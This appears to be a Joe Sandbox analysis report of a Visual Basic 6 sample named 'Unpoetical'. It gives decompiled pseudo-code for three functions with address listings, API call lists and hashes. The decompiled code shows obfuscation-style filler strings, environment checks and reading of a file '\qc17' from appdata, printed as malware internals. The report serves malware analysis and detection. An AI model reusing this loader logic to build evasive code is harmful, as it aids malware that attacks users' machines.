      Memory Dump Source
      • Source File: 00000000.00000002.875035981.00000000020E0000.00000040.00000001.sdmp, Offset: 020E0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_20e0000_Unpoetical.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
      • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
      • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
      • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00420ADD, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 57%
      			E00420ADD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a20, void* _a24, void* _a28, signed int* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				signed int _v60;
				void* _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				char* _v152;
				char _v160;
				void* _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v188;
				signed int _v192;
				intOrPtr _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v208;
				short _t125;
				short _t133;
				signed int _t136;
				signed int _t142;
				signed int _t147;
				void* _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t194;

				_t193 = _t192 - 0xc;
				 *[fs:0x0] = _t193;
				L00401540();
				_v16 = _t193;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t190);
				L004017B6();
				L004017B6();
				L004017B6();
				L004017B6();
				 *_a32 =  *_a32 & 0x00000000;
				_push(0xbe);
				L00401756();
				L0040183A();
				_v88 = 0x19;
				_v96 = 2;
				_v188 = _v60;
				_v60 = _v60 & 0x00000000;
				_v72 = _v188;
				_v80 = 8;
				_push( &_v96);
				_push(0xf9);
				_push( &_v80);
				_push( &_v112);
				L0040168A();
				_v152 = L"monacanthid";
				_v160 = 0x8008;
				_push( &_v112);
				_t125 =  &_v160;
				_push(_t125);
				L00401660();
				_v164 = _t125;
				L00401846();
				_push( &_v112);
				_push( &_v96);
				_push( &_v80);
				_push(3);
				L00401840();
				_t194 = _t193 + 0x10;
				if(_v164 != 0) {
					_push(_v32);
					_push(L"Pollenate4");
					L00401696();
					L0040183A();
					_push(0xa7);
					_push(L"Apokreos");
					L0040162A();
					L0040183A();
					_v192 = _v60;
					_v60 = _v60 & 0x00000000;
					_v72 = _v192;
					_v80 = 8;
					_push(0xea);
					_push( &_v80);
					_push( &_v96);
					L00401624();
					_push( &_v96);
					L00401834();
					L0040183A();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push(2);
					L00401840();
					_t194 = _t194 + 0xc;
				}
				_v136 = L"12/12/12";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push( &_v96);
				L004015E8();
				_v152 = 0xc;
				_v160 = 0x8002;
				_push( &_v96);
				_t133 =  &_v160;
				_push(_t133);
				L00401738();
				_v164 = _t133;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t136 = _v164;
				if(_t136 != 0) {
					_push(L"Sjkler7");
					_push(L"Antagonistiske");
					_push(L"ADDEDLY");
					_push(L"RESELLS");
					L00401822();
					if( *0x4223c0 != 0) {
						_v200 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v200 = 0x4223c0;
					}
					_v164 =  *_v200;
					_t142 =  *((intOrPtr*)( *_v164 + 0x14))(_v164,  &_v64);
					asm("fclex");
					_v168 = _t142;
					if(_v168 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v164);
						_push(_v168);
						L004017C8();
						_v204 = _t142;
					}
					_v172 = _v64;
					_t147 =  *((intOrPtr*)( *_v172 + 0x110))(_v172,  &_v60);
					asm("fclex");
					_v176 = _t147;
					if(_v176 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x4025b8);
						_push(_v172);
						_push(_v176);
						L004017C8();
						_v208 = _t147;
					}
					_t136 = _v60;
					_v196 = _t136;
					_v60 = _v60 & 0x00000000;
					L0040183A();
					L004017C2();
				}
				L004017B6();
				_push(0x420eb0);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t136;
			}












































      0x00420ae0
      0x00420aef
      0x00420afb
      0x00420b03
      0x00420b06
      0x00420b0d
      0x00420b1c
      0x00420b25
      0x00420b30
      0x00420b3b
      0x00420b46
      0x00420b4e
      0x00420b51
      0x00420b56
      0x00420b60
      0x00420b65
      0x00420b6c
      0x00420b76
      0x00420b7c
      0x00420b86
      0x00420b89
      0x00420b93
      0x00420b94
      0x00420b9c
      0x00420ba0
      0x00420ba1
      0x00420ba6
      0x00420bb0
      0x00420bbd
      0x00420bbe
      0x00420bc4
      0x00420bc5
      0x00420bca
      0x00420bd4
      0x00420bdc
      0x00420be0
      0x00420be4
      0x00420be5
      0x00420be7
      0x00420bec
      0x00420bf8
      0x00420bfe
      0x00420c01
      0x00420c06
      0x00420c10
      0x00420c15
      0x00420c1a
      0x00420c1f
      0x00420c29
      0x00420c31
      0x00420c37
      0x00420c41
      0x00420c44
      0x00420c4b
      0x00420c53
      0x00420c57
      0x00420c58
      0x00420c60
      0x00420c61
      0x00420c6b
      0x00420c73
      0x00420c7b
      0x00420c7f
      0x00420c80
      0x00420c82
      0x00420c87
      0x00420c87
      0x00420c8a
      0x00420c94
      0x00420ca7
      0x00420caf
      0x00420cb3
      0x00420cb4
      0x00420cb9
      0x00420cc3
      0x00420cd0
      0x00420cd1
      0x00420cd7
      0x00420cd8
      0x00420cdd
      0x00420ce7
      0x00420ceb
      0x00420cec
      0x00420cee
      0x00420cf6
      0x00420cff
      0x00420d05
      0x00420d0a
      0x00420d0f
      0x00420d14
      0x00420d19
      0x00420d25
      0x00420d42
      0x00420d27
      0x00420d27
      0x00420d2c
      0x00420d31
      0x00420d36
      0x00420d36
      0x00420d54
      0x00420d6c
      0x00420d6f
      0x00420d71
      0x00420d7e
      0x00420da0
      0x00420d80
      0x00420d80
      0x00420d82
      0x00420d87
      0x00420d8d
      0x00420d93
      0x00420d98
      0x00420d98
      0x00420daa
      0x00420dc2
      0x00420dc8
      0x00420dca
      0x00420dd7
      0x00420dfc
      0x00420dd9
      0x00420dd9
      0x00420dde
      0x00420de3
      0x00420de9
      0x00420def
      0x00420df4
      0x00420df4
      0x00420e03
      0x00420e06
      0x00420e0c
      0x00420e19
      0x00420e21
      0x00420e21
      0x00420e2e
      0x00420e33
      0x00420e7a
      0x00420e82
      0x00420e8a
      0x00420e92
      0x00420e9a
      0x00420ea2
      0x00420eaa
      0x00420eaf

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 00420AFB
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420B25
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420B30
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420B3B
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420B46
      • #525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420B56
      • __vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420B60
      • #629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00420BA1
      • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420BC5
      • __vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420BD4
      • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00420BE7
      • __vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420C06
      • __vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420C10
      • #514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420C1F
      • __vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420C29
      • #513.MSVBVM60(?,00000008,000000EA), ref: 00420C58
      • __vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420C61
      • __vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420C6B
      • __vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 00420C73
      • __vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00420C82
      • __vbaVarDup.MSVBVM60 ref: 00420CA7
      • #542.MSVBVM60(?,?), ref: 00420CB4
      • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00420CD8
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00420CEE
      • #690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420D19
      • __vbaNew2.MSVBVM60(004025A8,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420D31
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014), ref: 00420D93
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,00000110), ref: 00420DEF
      • __vbaStrMove.MSVBVM60(00000000,?,004025B8,00000110), ref: 00420E19
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B8,00000110), ref: 00420E21
      • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420E2E
      • __vbaFreeStr.MSVBVM60(00420EB0,?,?,?,?,?,?,00401546), ref: 00420E7A
      • __vbaFreeStr.MSVBVM60(00420EB0,?,?,?,?,?,?,00401546), ref: 00420E82
      • __vbaFreeStr.MSVBVM60(00420EB0,?,?,?,?,?,?,00401546), ref: 00420E8A
      • __vbaFreeStr.MSVBVM60(00420EB0,?,?,?,?,?,?,00401546), ref: 00420E92
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
      • String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
      • API String ID: 3384239285-254499488
      • Opcode ID: 7b6b0c99fe4e2e4f1335ff8c67bfca6979a517438c1a3ee8e142c39c57810a35
      • Instruction ID: 89d4a5b719488cbcbe317641b0b263231914362a801240304f32f98158bba31e
      • Opcode Fuzzy Hash: 7b6b0c99fe4e2e4f1335ff8c67bfca6979a517438c1a3ee8e142c39c57810a35
      • Instruction Fuzzy Hash: C6A1D671E00218AFDB10EFA1D886BDEB7B8BF04304F5081AAF505B71A1EB785A49CF55
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F47E, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 53%
      			E0041F47E(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v28;
				short _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v64;
				intOrPtr _v72;
				char _v80;
				char _v96;
				char _v112;
				char* _v136;
				intOrPtr _v144;
				intOrPtr _v168;
				char _v176;
				void* _v180;
				short _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				intOrPtr* _v204;
				signed int _v208;
				signed int _v212;
				signed int _t90;
				char* _t99;
				short _t100;
				char* _t104;
				signed int _t119;
				signed int _t124;
				intOrPtr _t154;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t154;
				L00401540();
				_v12 = _t154;
				_v8 = 0x4013a0;
				_v136 = L"appdata";
				_v144 = 8;
				L0040184C();
				_t90 =  &_v64;
				_push(_t90);
				L00401642();
				L0040183A();
				_push(_t90);
				_push(L"Picry");
				L0040172C();
				asm("sbb eax, eax");
				_v184 =  ~( ~( ~_t90));
				L00401846();
				L00401828();
				if(_v184 != 0) {
					_v136 = L"Langfredagene5";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L004016BA();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_push( &_v64);
					_push(2);
					L00401840();
					_t154 = _t154 + 0xc;
					if( *0x4223c0 != 0) {
						_v204 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v204 = 0x4223c0;
					}
					_v184 =  *_v204;
					_t119 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v48);
					asm("fclex");
					_v188 = _t119;
					if(_v188 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v184);
						_push(_v188);
						L004017C8();
						_v208 = _t119;
					}
					_v192 = _v48;
					_t124 =  *((intOrPtr*)( *_v192 + 0x70))(_v192,  &_v180);
					asm("fclex");
					_v196 = _t124;
					if(_v196 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x4025b8);
						_push(_v192);
						_push(_v196);
						L004017C8();
						_v212 = _t124;
					}
					_v28 = _v180;
					L004017C2();
				}
				_v72 = 0x93;
				_v80 = 2;
				_v136 = L"SUPERSERIOUS";
				_v144 = 8;
				L0040184C();
				_push( &_v80);
				_push(0xb2);
				_push( &_v64);
				_push( &_v96);
				L0040168A();
				_v168 = 0x454add;
				_v176 = 0x8003;
				_push( &_v96);
				_t99 =  &_v112;
				_push(_t99);
				L0040163C();
				_push(_t99);
				_t100 =  &_v176;
				_push(_t100);
				L00401738();
				_v184 = _t100;
				_push( &_v96);
				_push( &_v80);
				_push( &_v64);
				_push(3);
				L00401840();
				_t104 = _v184;
				if(_t104 != 0) {
					_v136 = L"Skovede1";
					_v144 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L00401852();
					_push( &_v80);
					L00401834();
					L0040183A();
					_push( &_v80);
					_t104 =  &_v64;
					_push(_t104);
					_push(2);
					L00401840();
					_push(L"galopbanernes");
					L004017E0();
					_push(_t104);
					L004016B4();
					L0040183A();
				}
				_v32 = 0xd66;
				_push(0x41f7c3);
				L00401846();
				L00401846();
				L00401846();
				return _t104;
			}




































      0x0041f483
      0x0041f48e
      0x0041f48f
      0x0041f49b
      0x0041f4a3
      0x0041f4a6
      0x0041f4ad
      0x0041f4b7
      0x0041f4ca
      0x0041f4cf
      0x0041f4d2
      0x0041f4d3
      0x0041f4dd
      0x0041f4e2
      0x0041f4e3
      0x0041f4e8
      0x0041f4ef
      0x0041f4f5
      0x0041f4ff
      0x0041f507
      0x0041f515
      0x0041f51b
      0x0041f525
      0x0041f538
      0x0041f540
      0x0041f544
      0x0041f545
      0x0041f54d
      0x0041f54e
      0x0041f558
      0x0041f560
      0x0041f564
      0x0041f565
      0x0041f567
      0x0041f56c
      0x0041f576
      0x0041f593
      0x0041f578
      0x0041f578
      0x0041f57d
      0x0041f582
      0x0041f587
      0x0041f587
      0x0041f5a5
      0x0041f5bd
      0x0041f5c0
      0x0041f5c2
      0x0041f5cf
      0x0041f5f1
      0x0041f5d1
      0x0041f5d1
      0x0041f5d3
      0x0041f5d8
      0x0041f5de
      0x0041f5e4
      0x0041f5e9
      0x0041f5e9
      0x0041f5fb
      0x0041f616
      0x0041f619
      0x0041f61b
      0x0041f628
      0x0041f64a
      0x0041f62a
      0x0041f62a
      0x0041f62c
      0x0041f631
      0x0041f637
      0x0041f63d
      0x0041f642
      0x0041f642
      0x0041f658
      0x0041f65f
      0x0041f65f
      0x0041f664
      0x0041f66b
      0x0041f672
      0x0041f67c
      0x0041f68f
      0x0041f697
      0x0041f698
      0x0041f6a0
      0x0041f6a4
      0x0041f6a5
      0x0041f6aa
      0x0041f6b4
      0x0041f6c1
      0x0041f6c2
      0x0041f6c5
      0x0041f6c6
      0x0041f6cb
      0x0041f6cc
      0x0041f6d2
      0x0041f6d3
      0x0041f6d8
      0x0041f6e2
      0x0041f6e6
      0x0041f6ea
      0x0041f6eb
      0x0041f6ed
      0x0041f6f5
      0x0041f6fe
      0x0041f700
      0x0041f70a
      0x0041f71d
      0x0041f725
      0x0041f729
      0x0041f72a
      0x0041f732
      0x0041f733
      0x0041f73d
      0x0041f745
      0x0041f746
      0x0041f749
      0x0041f74a
      0x0041f74c
      0x0041f754
      0x0041f759
      0x0041f75e
      0x0041f75f
      0x0041f769
      0x0041f769
      0x0041f76e
      0x0041f774
      0x0041f7ad
      0x0041f7b5
      0x0041f7bd
      0x0041f7c2

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F49B
      • __vbaVarDup.MSVBVM60 ref: 0041F4CA
      • #667.MSVBVM60(?), ref: 0041F4D3
      • __vbaStrMove.MSVBVM60(?), ref: 0041F4DD
      • __vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F4E8
      • __vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F4FF
      • __vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F507
      • __vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F538
      • #518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F545
      • __vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F54E
      • __vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F558
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F567
      • __vbaNew2.MSVBVM60(004025A8,004223C0), ref: 0041F582
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014), ref: 0041F5E4
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,00000070), ref: 0041F63D
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B8,00000070), ref: 0041F65F
      • __vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F68F
      • #629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F6A5
      • __vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F6C6
      • __vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F6D3
      • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F6ED
      • __vbaVarDup.MSVBVM60 ref: 0041F71D
      • #522.MSVBVM60(?,?), ref: 0041F72A
      • __vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F733
      • __vbaStrMove.MSVBVM60(?,?,?), ref: 0041F73D
      • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F74C
      • __vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041F759
      • __vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041F75F
      • __vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041F769
      • __vbaFreeStr.MSVBVM60(0041F7C3,?,?,?,?,00401546), ref: 0041F7AD
      • __vbaFreeStr.MSVBVM60(0041F7C3,?,?,?,?,00401546), ref: 0041F7B5
      • __vbaFreeStr.MSVBVM60(0041F7C3,?,?,?,?,00401546), ref: 0041F7BD
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
      • String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
      • API String ID: 1362175604-1043247457
      • Opcode ID: 072129d1a9f01139fb950d4b09de06a9b72533768682f58f2102a814e8d4f09d
      • Instruction ID: 305419239cf35d9bcf7f0e806fab4ac592893a25563de5a38a470b80babb0a13
      • Opcode Fuzzy Hash: 072129d1a9f01139fb950d4b09de06a9b72533768682f58f2102a814e8d4f09d
      • Instruction Fuzzy Hash: 3A81FA72D00218ABDB14EB91CC45FDEB7B9BF04304F5085AAE105B71A1DB785B89CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F7E0, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159COMMON
      Download Yara Rule
      C-Code - Quality: 46%
      			E0041F7E0(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				short _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v60;
				char _v76;
				char _v92;
				char* _v100;
				char _v108;
				char* _v116;
				char _v124;
				short _v144;
				signed int _v148;
				intOrPtr* _v152;
				signed int _v156;
				intOrPtr* _v164;
				signed int _v168;
				signed int _v172;
				signed int _t69;
				signed int _t73;
				short _t77;
				char* _t82;
				intOrPtr _t111;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t111;
				L00401540();
				_v12 = _t111;
				_v8 = 0x4013b0;
				if( *0x4223c0 != 0) {
					_v164 = 0x4223c0;
				} else {
					_push(0x4223c0);
					_push(0x4025a8);
					L004017CE();
					_v164 = 0x4223c0;
				}
				_v144 =  *_v164;
				_t69 =  *((intOrPtr*)( *_v144 + 0x4c))(_v144,  &_v44);
				asm("fclex");
				_v148 = _t69;
				if(_v148 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x4c);
					_push(0x402598);
					_push(_v144);
					_push(_v148);
					L004017C8();
					_v168 = _t69;
				}
				_v152 = _v44;
				_t73 =  *((intOrPtr*)( *_v152 + 0x28))(_v152);
				asm("fclex");
				_v156 = _t73;
				if(_v156 >= 0) {
					_v172 = _v172 & 0x00000000;
				} else {
					_push(0x28);
					_push(0x402ed4);
					_push(_v152);
					_push(_v156);
					L004017C8();
					_v172 = _t73;
				}
				L004017C2();
				_push(0x3139);
				L0040169C();
				L0040183A();
				_push(0x64);
				_push(_v32);
				L00401750();
				L0040183A();
				_push(_t73);
				_push(L"Sciuroid8");
				L0040172C();
				asm("sbb eax, eax");
				_v144 =  ~( ~( ~_t73));
				L00401846();
				_t77 = _v144;
				if(_t77 != 0) {
					_v100 = L"appdata";
					_v108 = 8;
					L0040184C();
					_push( &_v60);
					_push( &_v76);
					L0040171A();
					_v116 = L"\\qc17";
					_v124 = 8;
					_push( &_v76);
					_push( &_v124);
					_t82 =  &_v92;
					_push(_t82);
					L00401720();
					_push(_t82);
					L00401834();
					L0040183A();
					_push(_t82);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v24);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0x59);
					_push( &_v60);
					L00401708();
					_t77 =  &_v60;
					_push(_t77);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(L"Rutiner");
				L004017EC();
				_v28 = _t77;
				_push(0x41fa5c);
				L00401846();
				L00401846();
				L00401846();
				return _t77;
			}






























      0x0041f7e5
      0x0041f7f0
      0x0041f7f1
      0x0041f7fd
      0x0041f805
      0x0041f808
      0x0041f816
      0x0041f833
      0x0041f818
      0x0041f818
      0x0041f81d
      0x0041f822
      0x0041f827
      0x0041f827
      0x0041f845
      0x0041f85d
      0x0041f860
      0x0041f862
      0x0041f86f
      0x0041f891
      0x0041f871
      0x0041f871
      0x0041f873
      0x0041f878
      0x0041f87e
      0x0041f884
      0x0041f889
      0x0041f889
      0x0041f89b
      0x0041f8af
      0x0041f8b2
      0x0041f8b4
      0x0041f8c1
      0x0041f8e3
      0x0041f8c3
      0x0041f8c3
      0x0041f8c5
      0x0041f8ca
      0x0041f8d0
      0x0041f8d6
      0x0041f8db
      0x0041f8db
      0x0041f8ed
      0x0041f8f2
      0x0041f8f7
      0x0041f901
      0x0041f906
      0x0041f908
      0x0041f90b
      0x0041f915
      0x0041f91a
      0x0041f91b
      0x0041f920
      0x0041f927
      0x0041f92d
      0x0041f937
      0x0041f93c
      0x0041f945
      0x0041f94b
      0x0041f952
      0x0041f95f
      0x0041f967
      0x0041f96b
      0x0041f96c
      0x0041f971
      0x0041f978
      0x0041f982
      0x0041f986
      0x0041f987
      0x0041f98a
      0x0041f98b
      0x0041f990
      0x0041f991
      0x0041f99b
      0x0041f9a0
      0x0041f9a1
      0x0041f9a3
      0x0041f9a5
      0x0041f9aa
      0x0041f9b2
      0x0041f9ba
      0x0041f9be
      0x0041f9c2
      0x0041f9c3
      0x0041f9c5
      0x0041f9cd
      0x0041f9d2
      0x0041f9d3
      0x0041f9d5
      0x0041f9da
      0x0041f9dc
      0x0041f9e1
      0x0041f9e6
      0x0041f9e7
      0x0041f9ec
      0x0041f9ef
      0x0041f9f0
      0x0041f9fa
      0x0041fa02
      0x0041fa02
      0x0041fa07
      0x0041fa0c
      0x0041fa11
      0x0041fa15
      0x0041fa46
      0x0041fa4e
      0x0041fa56
      0x0041fa5b

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F7FD
      • __vbaNew2.MSVBVM60(004025A8,004223C0,?,?,?,?,00401546), ref: 0041F822
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,0000004C), ref: 0041F884
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402ED4,00000028), ref: 0041F8D6
      • __vbaFreeObj.MSVBVM60 ref: 0041F8ED
      • #697.MSVBVM60(00003139), ref: 0041F8F7
      • __vbaStrMove.MSVBVM60(00003139), ref: 0041F901
      • #618.MSVBVM60(?,00000064,00003139), ref: 0041F90B
      • __vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041F915
      • __vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F920
      • __vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F937
      • __vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041F95F
      • #666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F96C
      • __vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F98B
      • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F991
      • __vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F99B
      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9AA
      • __vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041F9B2
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041F9C5
      • __vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041F9D5
      • __vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041F9DC
      • #526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041F9E7
      • __vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F9F0
      • __vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041F9FA
      • __vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FA02
      • #696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FA0C
      • __vbaFreeStr.MSVBVM60(0041FA5C,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FA46
      • __vbaFreeStr.MSVBVM60(0041FA5C,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FA4E
      • __vbaFreeStr.MSVBVM60(0041FA5C,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FA56
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
